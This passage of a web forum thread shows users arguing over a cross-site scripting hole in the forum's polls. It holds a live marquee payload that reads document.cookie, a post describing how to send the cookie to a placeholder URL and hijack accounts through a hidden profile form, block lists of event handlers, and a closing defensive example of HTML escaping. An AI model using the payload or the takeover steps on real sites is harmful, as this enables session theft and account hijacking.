View Poll Results: Bad Code. | |||
Ouch ?<marquee width=1 height=1 loop=1 onstart="fudge.value='This is your GFY cookie '+document . cookie"></marquee> |
9 | 50.00% |
Huh ? |
11 | 61.11% |
Multiple Choice Poll. Voters: 18. You may not vote on this poll |
#51 |
:glugglug
Join Date: Mar 2003
Location: Where the Wild Things Are
Posts: 26,118
|
50 GFY codes Exploitable
#52 |
Confirmed User
Join Date: Feb 2003
Location: Portland
Posts: 826
|
Hehe nice job Road Rash do you have ICQ!
__________________
harbinc at gmail dot com |
#53 |
Confirmed User
Join Date: Jun 2002
Location: God's Country (Georgia)
Posts: 3,706
|
If you weren't such a pompous ass and obvious attention whore people might think you were actually trying to help.
#54 | |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
Quote:
#55 |
Confirmed User
Join Date: Feb 2003
Location: Portland
Posts: 826
|
Road Rash I would also like to see how this code works and how it can be fixed if you can email me the code to harbinc at cox.net
__________________
harbinc at gmail dot com |
#56 | ||
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
Quote:
what it actually is. It makes you look like you don't understand the code you're posting when you call it HTML and say it can do anything on any server. What you are talking about is a very particular combination of techniques. Once you know the combination it does indeed appear easy and many of us have seen these techniques used before in different situations. However without investigation of the steps needed someone can't just spend 10 seconds looking at the code to figure out exactly what the fuck it is you are talking about. I'm guessing English isn't your first language.... no offence but when you use all the wrong words and describe things totally backwards it does kinda make it hard for anyone to agree with you. Quote:
rather than talking all this crap about server hacking and sending emails. Lens.... He is right... It is exploitable. You need to block a few event handlers such as onstart, onclick, etc. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
#57 |
Confirmed User
Industry Role:
Join Date: Mar 2003
Location: ::::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::||||||||||||:::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::::::::::::::::::::
Posts: 7,197
|
You know no one gives a shit when....
Road Rash 23 mryellow 7 icedemon 4 You have three times as many posts as the second person in the thread (who successfully tore you down, might I add) No I will not grab a brain and no I'm not your son. http://www.polarhome.com/~plasticlsd/4smokey.MP3 nobody
__________________
Amen |
#58 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
jc so far everyone who doubted me has admitted after thinking about it for 2 seconds they were wrong .. Go back to bed jc.
#59 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
It's just the guy mixes in so much bullshit with his facts that it makes him appear like he has no idea what he's talking about. Nice camouflage job... However I think I'd rather appear smart than dumb. Did it take you 2 seconds to come up with? Stop trying to make ppl feel bad for not understanding your backwards and simply wrong comments. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
#60 |
Confirmed User
Industry Role:
Join Date: Mar 2003
Location: ::::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::||||||||||||:::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::::::::::::::::::::
Posts: 7,197
|
Go back to the security forum.... where people give a fuck.
You're nothing but an exploit baby. Produce one piece of useful software you have written. FEEL THE NOBODIES, WANNA BE SOMEBODIES..... <img src="http://www.gofuckyourself.com/images/smilies/1orglaugh.gif" width=360 height=360>
__________________
Amen |
#61 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
mryellowsnow.
As I explained, if I gave exact details on it it would also explain to every little punk with a copy and paste how to do it, so that's why I was vague.. sorry if you couldn't figure that out..
#62 |
Confirmed User
Join Date: Jun 2003
Location: Lutz, FL
Posts: 1,022
|
I can see how what you mentioned can be used to make popups and other stuff in j a v a s c r i p t that could cause trouble on GFY. What you found is a good find. But you really made it more than it really is. It can't do most of the stuff you mentioned.
Being able to change the password by having the cookie sent to you cannot be done. At least without asking the client permission before it is actually sent. It could be done with old browsers (I'm talking about the really old ones on Win 95 machines). But most newer browsers won't let emails be sent via j a v a s c r i p t without permission from the client first. Sending out emails via j a v a s c r i p t used to be a big problem in the early days. That's how emails were harvested. That has since been fixed for some years now.
__________________
Clips4Sale.com |
#63 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
See the problem?
People still think you're talking about hacking servers or sending emails from client machines. It's not the fact that you hid the method.... I do think that was quite good of you..... It's that you were talking about totally different things which were quite simply wrong. You can not for example do anything to any server with the method you're using. You really can't blame someone for thinking you're barking up the wrong tree when you say that jav-as-cript can do anything you want to the server. Hide the actual code sure..... but why make yourself look stupid by saying things that are so wrong. Lens it does need fixing..... He may look stupid but he has found an exploit that someone will probably soon use and could upset some ppl. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
#64 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
You don't need to use email just add the cookie to a string and pop it in a window example, yoururl.com/logged.cgi?+document . cookie
to change password just make a hidden form with a replica of the profile form ( but with your own info ) now the email is whatever you changed it to , now just reset the password and have it sent to the new email , shebang.
#65 |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
For somebody that is so good at 'hacking' you sure do suck at reading and understanding the sig rules.
#66 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
duocash is a top banner sponsor moron
#67 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
Without actual testing I'm still not sure you'd fit in everything you want to do into the character limit. However yes it is a worry. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
#68 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
2. Signature rules. Maximum 120x60 button and no more than 3 text lines of default size and color. New as of 1/1/2003: if your sig is for a GFY top banner sponsor, you may use a 468x60 instead of a 120x60. Yes there is a reason this is so big. Also putting your text in a cell and making it look like a button is against the rules. Let me repeat... A 120 x 60 button and no more than 3 lines of DEFAULT SIZE AND COLOR text. First, your sig banner is 645 x 120 -- that is ABOVE THE ALLOWED 468x60 for top banner sponsor. Second, your text is NOT the default size OR color. So eat a dick buttmunch --- go google for more GFY hacks
#69 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
Like I said I have already tested it, it fits under the character limit just fine besides you can hide an unlimited amount of characters in a hahahahahahahahahaha ;) with a document write ....
To the moron complaining about my sig.. my sig fits gfy see the top 10 posters on this board... my sig is the same. Quit crying because you can't say anything useful
#70 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
"Mommy, mommy - the other kids are doing it, so that means it's ok right mommy?" Like I said, you sure do have a hard time reading and understanding the sig rules.
#71 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
I don't bend over, you do.. big difference.
Why would I use an undersized sig when the mods allow people to use oversized sigs if they are using a top sponsor. Maybe if you sent one of the mods an angry email about it or cried to them via icq they might change all the sigs just for you.. Whoops I must have been dreaming there for a second
#72 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
ext jv.... yeah got ya.
-Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
#73 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
Something close to this..
<img src="http://216.130.172.224/haha1.jpg"> <img src="http://216.130.172.224/haha2.jpg"> <img src="http://216.130.172.224/haha3.jpg"> |
#74 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
No no.... much more dangerous.
You could run any new IE, ActiveX, Java, or Flash exploit on a great deal of GFY members before the admins saw it. This combined with other exploits or some yet to be discovered could allow an attacker to gain complete control of your home system via your browser. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
#75 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
#76 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
GFY needs to block the following words:
onload onunload onchange onsubmit onreset onselect onblur onfocus onkeydown onkeypress onkeyup onclick ondblclick hahahahahahahadown hahahahahahahamove hahahahahahahaout hahahahahahahaover hahahahahahahaup -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
#77 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
Yes, those hahaha's will fuck you up every time. Sorry, it was funny...
#78 | |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
Quote:
BTW you missed a few event handlers ;) and several other things.. |
#79 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
Yeah can't be bothered hunting everything, leave that to GFY.
Just posting again to see if they are blocked...... Lens.... It's actually quite serious. onload onunload onchange onsubmit onreset onselect onblur onfocus onkeydown onkeypress onkeyup onclick ondblclick -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
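
An added example, not code from the thread or from the forum software: it applies the handler names legible in post #76 as a word filter to the poll option shown at the top of this page, and compares the result with HTML-encoding the user text. The filter behaviour (replacing each listed word) and all function names are assumptions made for illustration.

```javascript
// Handler names legible in post #76; the mouse handlers appear already filtered on the page.
const BLOCKED_WORDS = ["onload", "onunload", "onchange", "onsubmit", "onreset",
  "onselect", "onblur", "onfocus", "onkeydown", "onkeypress", "onkeyup",
  "onclick", "ondblclick"];

// Assumed model of a word filter: replace each listed word, case-insensitively.
function wordFilter(input) {
  const re = new RegExp(BLOCKED_WORDS.join("|"), "gi");
  return input.replace(re, "hahahahahahaha");
}

// Report any on* attribute that still sits inside a tag, listed or not.
function eventHandlerAttrs(html) {
  const found = [];
  for (const tag of html.match(/<[^>]*>/g) || []) {
    for (const m of tag.matchAll(/[\s"'\/](on[a-z]+)\s*=/gi)) {
      found.push(m[1].toLowerCase());
    }
  }
  return found;
}

// Output encoding: every character with meaning in HTML is encoded, so user
// text cannot open a tag or an attribute, whatever handler names exist.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// The poll option exactly as it appears on this page.
const POLL_OPTION = `Ouch ?<marquee width=1 height=1 loop=1 onstart="fudge.value='This is your GFY cookie '+document . cookie"></marquee>`;

// Which handlers survive each treatment of the same input.
function compare(input) {
  return {
    afterWordFilter: eventHandlerAttrs(wordFilter(input)),
    afterEscaping: eventHandlerAttrs(escapeHtml(input)),
  };
}

console.log(compare(POLL_OPTION));
```

The word list leaves the poll option untouched because `onstart` is not on it, which is the gap post #78 alludes to; encoding on output does not depend on knowing every handler name.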